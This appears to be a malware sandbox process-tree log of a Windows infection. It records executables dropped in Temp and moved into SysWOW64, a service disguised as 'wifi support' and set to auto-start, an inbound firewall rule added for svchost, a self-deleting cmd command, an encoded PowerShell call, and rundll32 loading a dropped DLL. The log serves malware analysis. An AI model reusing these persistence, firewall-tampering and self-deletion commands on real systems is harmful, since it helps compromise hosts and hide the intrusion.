C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\nlamgcnd.exe" C:\Windows\SysWOW64\vgznemm\2⤵PID:3748
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create vgznemm binPath= "C:\Windows\SysWOW64\vgznemm\nlamgcnd.exe /d\"C:\Users\Admin\AppData\Local\Temp\FCCE.exe\"" type= own start= auto DisplayName= "wifi support"2⤵PID:3560
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description vgznemm "wifi internet conection"2⤵PID:5524
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start vgznemm2⤵PID:3972
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul2⤵PID:3444
-
-
C:\Users\Admin\rykxgtuo.exe"C:\Users\Admin\rykxgtuo.exe" /d"C:\Users\Admin\AppData\Local\Temp\FCCE.exe"2⤵PID:4940
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\krdqzmnh.exe" C:\Windows\SysWOW64\vgznemm\3⤵PID:5700
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" config vgznemm binPath= "C:\Windows\SysWOW64\vgznemm\krdqzmnh.exe /d\"C:\Users\Admin\rykxgtuo.exe\""3⤵PID:3788
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start vgznemm3⤵PID:3220
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul3⤵PID:5640
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\3475.bat" "3⤵PID:3716
-
-
-
C:\Program Files (x86)\Google\Update\GoogleUpdate.exe"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ua /installsource core1⤵PID:5608
-
C:\Users\Admin\AppData\Local\Temp\3C2F.exeC:\Users\Admin\AppData\Local\Temp\3C2F.exe1⤵PID:5352
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5352 -s 14162⤵
- Program crash
PID:5900
-
-
C:\Users\Admin\AppData\Local\Temp\88F8.exeC:\Users\Admin\AppData\Local\Temp\88F8.exe1⤵PID:3244
-
C:\Users\Admin\AppData\Local\Temp\E51C.exeC:\Users\Admin\AppData\Local\Temp\E51C.exe1⤵PID:5444
-
C:\Program Files (x86)\Google\Update\GoogleUpdate.exe"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc1⤵PID:5452
-
C:\Users\Admin\AppData\Local\Temp\D0A4.exeC:\Users\Admin\AppData\Local\Temp\D0A4.exe1⤵PID:2568
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\D0A4.exe"2⤵PID:5936
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK3⤵
- Delays execution with timeout.exe
PID:6500
-
-
-
C:\Users\Admin\AppData\Local\Temp\230.exeC:\Users\Admin\AppData\Local\Temp\230.exe1⤵PID:6008
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMgAwAA==2⤵PID:6312
-
-
C:\Users\Admin\AppData\Local\Temp\230.exeC:\Users\Admin\AppData\Local\Temp\230.exe2⤵PID:3576
-
-
C:\Users\Admin\AppData\Local\Temp\78B7.exeC:\Users\Admin\AppData\Local\Temp\78B7.exe1⤵PID:6720
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:3368 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:976
-